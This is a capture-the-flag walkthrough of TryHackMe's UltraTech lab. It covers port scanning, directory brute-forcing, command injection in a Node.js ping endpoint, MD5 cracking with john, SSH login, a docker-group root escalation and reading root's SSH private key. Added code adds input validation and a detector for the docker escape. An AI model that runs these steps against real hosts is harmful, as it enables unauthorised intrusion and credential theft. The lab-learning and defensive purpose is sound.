# UltraTech

{% embed url="https://tryhackme.com/room/ultratech1" %}

## Task 1: Deploy the machine

### Deploy the machine

<figure><img src="/files/zCSIKyf2fZR1NpcVu2ZZ" alt=""><figcaption></figcaption></figure>

### No answer needed

## Task 2: It's enumeration time!

### Which software is using the port 8081?

* First, let's run a simple `nmap` scan to see the open ports.

```
$ nmap -p- 10.10.26.63 -T4
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-10 10:18 IST
Warning: 10.10.26.63 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.26.63
Host is up (0.13s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
5945/tcp  filtered unknown
8081/tcp  open     blackice-icecap
13012/tcp filtered unknown
13146/tcp filtered unknown
14464/tcp filtered unknown
25132/tcp filtered unknown
26517/tcp filtered unknown
28167/tcp filtered unknown
29393/tcp filtered unknown
31331/tcp open     unknown
52117/tcp filtered unknown
52621/tcp filtered unknown
59562/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 826.80 seconds
```

* Now we can run another `nmap` scan on only the ports that are open.

```
$ nmap -p 21,22,8081,31331 -A 10.10.26.63
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-10 11:02 IST
Nmap scan report for 10.10.26.63
Host is up (0.13s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_  256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp  open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.96 seconds
```

* There are four open ports:

| Port  | Service        |
| ----- | -------------- |
| 21    | ftp            |
| 22    | ssh            |
| 8081  | http (node.js) |
| 31331 | http (apache)  |

* The service running on port 8081 is Node.js.

### Answer

```
Node.js
```

### Which other non-standard port is used?

* 31331 is the other non-standard port.

### Answer

```
31331
```

### Which software using this port?

* The software on port 31331 is Apache.

### Answer

```
Apache
```

### Which GNU/Linux distribution seems to be used?

* The GNU/Linux distribution is Ubuntu.

### Answer

```
Ubuntu
```

### The software using the port 8081 is a REST api, how many of its routes are used by the web application?

* We can see that two routes are being used by the application.

```
8081/tcp  open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
```

### Answer

```
2
```

## Task 3: Let the fun begin

### There is a database lying around, what is its filename?

* We can brute force the web pages on the `8081` port using `gobuster`.

```
$ gobuster dir -u http://10.10.26.63:8081 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.26.63:8081
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/auth                 (Status: 200) [Size: 39]
/ping                 (Status: 500) [Size: 1094]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
```

* Let's go to the `/ping` page.

<figure><img src="/files/fRauLvxphWd0kfzojYHR" alt=""><figcaption></figcaption></figure>

* So the endpoint expects a parameter; since we have not supplied one, we get the error.
* Let's try providing an IP address.

<figure><img src="/files/zMU2fOchx4TAvQDibHS1" alt=""><figcaption></figcaption></figure>

* So the application executes the ping command with the IP we provide.
* Let's see if it executes a command that we provide.

<figure><img src="/files/6TFp8eo3xfgf88Bf4Axh" alt=""><figcaption></figcaption></figure>

* It does, and the output reveals the database's filename.
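As an added example (not code from the room or this write-up), the pattern behind the `/ping` behaviour above: splicing the user value into a shell command string, next to a validated form that only accepts a real IPv4 address and passes it as a single argv element. The handler shape and function names are assumptions.

```javascript
// Vulnerable pattern (assumed shape of the endpoint): the user value is spliced
// into a shell command, so "10.10.26.63; ls" makes the shell run ping AND ls.
function buildVulnerableCommand(ip) {
  return `ping -c 1 ${ip}`;
}

// Strict dotted-quad check: four decimal octets 0-255, no leading zeros,
// nothing else. Separators, whitespace and shell metacharacters all fail.
function isValidIPv4(value) {
  const parts = value.split(".");
  if (parts.length !== 4) return false;
  return parts.every((p) => /^(0|[1-9][0-9]{0,2})$/.test(p) && Number(p) <= 255);
}

// Characters a shell interprets; rejected input matching this is worth logging
// as a probe, since a plain typo rarely contains them.
const SHELL_META = /[;&|`$(){}<>\\'"\n\r ]/;
function looksLikeInjection(value) {
  return SHELL_META.test(value);
}

// Hardened form: validate first, then build an argv array for execFile-style
// execution, where the address is one argument that no shell ever parses.
function buildSafePingArgv(ip) {
  if (!isValidIPv4(ip)) return null;
  return ["ping", "-c", "1", ip];
}

// Runs both checks over a list of inputs and returns the verdicts.
function triage(inputs) {
  return inputs.map((ip) => ({
    input: ip,
    accepted: buildSafePingArgv(ip) !== null,
    suspicious: looksLikeInjection(ip),
  }));
}

// Constructed sample inputs: a normal probe and the injection shape seen above.
const SAMPLE_INPUTS = ["10.10.26.63", "10.10.26.63; ls"];
```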

### Answer

```
utech.db.sqlite
```

### What is the first user's password hash?

* We can read the password hashes from the database file using `cat`.

<figure><img src="/files/zol0dOpU7wOlZf9278hI" alt=""><figcaption></figcaption></figure>

* We get two password hashes, one for the `r00t` user and one for the `admin` user.

| Username | Password hash                    |
| -------- | -------------------------------- |
| r00t     | f357a0c52799563c7c7b76c1e7543a32 |
| admin    | 0d0ea5111e3c1def594c1684e3b9be84 |

### Answer

```
f357a0c52799563c7c7b76c1e7543a32
```

### What is the password associated with this hash?

* Let's use `hash-identifier` to identify the hash type.

```
$ hash-identifier f357a0c52799563c7c7b76c1e7543a32                     
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
```

* We can now crack the hash using `john`.

```
$ john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
n100906             (?)     
1g 0:00:00:00 DONE (2023-12-08 21:44) 5.000g/s 862080p/s 862080c/s 862080C/s erinbear..eagames
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 
```

### Answer

```
n100906
```

## Task 4: The root of all evil

### What are the first 9 characters of the root user's private SSH key?

* We can try logging in through SSH using the `r00t` user and `n100906` password.

```
$ ssh r00t@10.10.26.63             
r00t@10.10.26.63's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Dec 10 10:15:49 UTC 2023

  System load:  0.04               Processes:           102
  Usage of /:   24.4% of 19.56GB   Users logged in:     0
  Memory usage: 73%                IP address for eth0: 10.10.26.63
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

1 package can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Dec 10 09:44:13 2023 from 10.17.48.138
r00t@ultratech-prod:~$
```

* Let's check what `sudo` commands the `r00t` user can run.

```
r00t@ultratech-prod:~$ sudo -l
[sudo] password for r00t: 
Sorry, user r00t may not run sudo on ultratech-prod.
```

* Looks like we will have to find another way.
* If we run `id`, we can see that we are part of the `docker` group.

```
r00t@ultratech-prod:~$ id
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
r00t@ultratech-prod:~$ which docker
/usr/bin/docker
r00t@ultratech-prod:~$ ls -l /usr/bin/docker
-rwxr-xr-x 1 root root 68631952 Feb 13  2019 /usr/bin/docker
```

* Let's check the containers present.

```
r00t@ultratech-prod:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
bash                latest              495d6437fc1e        4 years ago         15.8MB
```

* We can see that there is a `bash` image available.
* GTFOBins lists a privilege escalation for members of the `docker` group that uses it.

<figure><img src="/files/wxw2Q9HbNIXi4q7dfmfX" alt=""><figcaption></figcaption></figure>

```
r00t@ultratech-prod:~$ docker run -v /:/mnt --rm -it bash chroot /mnt bash
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@78c7562da81f:/# 
```
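As an added detection-side example (not from the room or this write-up), a small auditor for `docker run` command lines that flags the host-root bind mount and the `chroot` into it, as a shell-history review or an EDR rule would. The option names are real docker CLI flags; the function and finding texts are my own.

```javascript
// Walks a tokenised `docker run` command line and returns a list of findings.
function auditDockerRun(argv) {
  const findings = [];
  const hostMounts = []; // container paths at which the host "/" is mounted
  for (let i = 0; i < argv.length; i++) {
    const tok = argv[i];
    if (tok === "--privileged") findings.push("--privileged drops container isolation");
    if (tok === "--pid=host") findings.push("container shares the host PID namespace");

    // -v / --volume, in both "-v SPEC" and "-v=SPEC" forms.
    let spec = null;
    if (tok === "-v" || tok === "--volume") spec = argv[++i] ?? "";
    else if (tok.startsWith("-v=") || tok.startsWith("--volume=")) spec = tok.slice(tok.indexOf("=") + 1);
    if (spec !== null) {
      const [src, dst] = spec.split(":");
      if (src === "/") {
        hostMounts.push(dst);
        findings.push(`host root filesystem bind-mounted at ${dst}`);
      } else if (src === "/var/run/docker.sock") {
        findings.push("docker socket mounted into the container");
      }
    }

    // --mount type=bind,source=/,target=/x (key=value pairs).
    if (tok === "--mount") {
      const kv = Object.fromEntries((argv[++i] ?? "").split(",").map((p) => p.split("=")));
      const src = kv.source ?? kv.src;
      const dst = kv.target ?? kv.dst;
      if (src === "/") {
        hostMounts.push(dst);
        findings.push(`host root filesystem bind-mounted at ${dst}`);
      }
    }

    // A chroot into a host-root mount is a root shell on the host.
    if (tok === "chroot" && hostMounts.includes(argv[i + 1])) {
      findings.push(`chroot into host mount ${argv[i + 1]} yields a root shell on the host`);
    }
  }
  return findings;
}

// Constructed sample: the command from the session above, tokenised.
const SAMPLE_ARGV = ["docker", "run", "-v", "/:/mnt", "--rm", "-it", "bash", "chroot", "/mnt", "bash"];
```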

* We are now the `root` user.
* Let's check the contents of the `root` directory.

```
root@78c7562da81f:/# ls -la /root
total 40
drwx------  6 root root 4096 Mar 22  2019 .
drwxr-xr-x 23 root root 4096 Mar 19  2019 ..
-rw-------  1 root root  844 Mar 22  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Mar 22  2019 .cache
drwx------  3 root root 4096 Mar 22  2019 .emacs.d
drwx------  3 root root 4096 Mar 22  2019 .gnupg
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root    0 Mar 22  2019 .python_history
drwx------  2 root root 4096 Mar 22  2019 .ssh
-rw-rw-rw-  1 root root  193 Mar 22  2019 private.txt
```

* The private key has to be inside the `.ssh` directory.
* Let's verify that.

```
root@78c7562da81f:/# ls -la /root/.ssh        
total 16
drwx------ 2 root root 4096 Mar 22  2019 .
drwx------ 6 root root 4096 Mar 22  2019 ..
-rw------- 1 root root    0 Mar 19  2019 authorized_keys
-rw------- 1 root root 1675 Mar 22  2019 id_rsa
-rw-r--r-- 1 root root  401 Mar 22  2019 id_rsa.pub
```

* We can now `cat` out the private key.

```
root@78c7562da81f:/# cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
```

### Answer

```
MIIEogIBA
```

